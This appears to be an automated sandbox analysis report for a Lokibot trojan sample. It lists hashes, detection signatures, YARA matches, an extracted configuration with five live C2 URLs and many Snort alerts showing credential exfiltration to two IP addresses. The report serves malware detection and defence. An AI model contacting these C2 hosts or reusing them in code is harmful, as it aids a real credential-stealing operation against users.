Loading ...

Play interactive tourEdit tour

Windows Analysis Report aZOmps0Ug8

Overview

General Information

Sample Name:aZOmps0Ug8 (renamed file extension from none to exe)
Analysis ID:502657
MD5:70d177abc7455c709ae9710630b9ea49
SHA1:4d81e55880a35c0157046560eca20b9f528838f4
SHA256:b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected Lokibot
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file registry)
Machine Learning detection for sample
Injects a PE file into a foreign processes
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • aZOmps0Ug8.exe (PID: 6780 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)
    • aZOmps0Ug8.exe (PID: 3980 cmdline: 'C:\Users\user\Desktop\aZOmps0Ug8.exe' MD5: 70D177ABC7455C709AE9710630B9EA49)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
    • 0x13e78:$s1: http://
    • 0x17633:$s1: http://
    • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
    • 0x13e80:$s2: https://
    • 0x13e78:$f1: http://
    • 0x17633:$f1: http://
    • 0x13e80:$f2: https://
    00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
          Click to see the 17 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          1.1.aZOmps0Ug8.exe.400000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0x13e78:$s1: http://
          • 0x17633:$s1: http://
          • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
          • 0x13e80:$s2: https://
          • 0x13e78:$f1: http://
          • 0x17633:$f1: http://
          • 0x13e80:$f2: https://
          1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              1.1.aZOmps0Ug8.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                1.1.aZOmps0Ug8.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                Click to see the 26 entries

                Sigma Overview

                No Sigma rule has matched

                Jbx Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.354804964.000000000F030000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php"]}
                Multi AV Scanner detection for submitted fileShow sources
                Source: aZOmps0Ug8.exeVirustotal: Detection: 43%Perma Link
                Antivirus detection for URL or domainShow sources
                Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpAvira URL Cloud: Label: malware
                Multi AV Scanner detection for domain / URLShow sources
                Source: 74f26d34ffff049368a6cff8812f86ee.gqVirustotal: Detection: 13%Perma Link
                Source: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpVirustotal: Detection: 16%Perma Link
                Machine Learning detection for sampleShow sources
                Source: aZOmps0Ug8.exeJoe Sandbox ML: detected

                Compliance:

                barindex
                Detected unpacking (overwrites its own PE header)Show sources
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeUnpacked PE file: 1.2.aZOmps0Ug8.exe.400000.0.unpack
                Source: aZOmps0Ug8.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                Source: Binary string: wntdll.pdbUGP source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: aZOmps0Ug8.exe, 00000000.00000003.347212605.000000000F200000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 0_2_00402671 FindFirstFileA,
                Source: C:\Users\user\Desktop\aZOmps0Ug8.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49779 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49780 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49781 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49782 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49783 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49784 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49785 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49786 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49787 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49788 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49789 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49790 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49791 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49792 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49793 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49794 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49795 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49798 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49799 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49800 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49801 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49802 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49803 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49804 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49805 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49806 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49807 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49808 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49810 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49811 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49812 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49813 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49814 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49815 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49816 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49817 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49820 -> 104.21.62.32:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49826 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49834 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49843 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49853 -> 172.67.219.104:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49860 -> 104.21.62.32:80
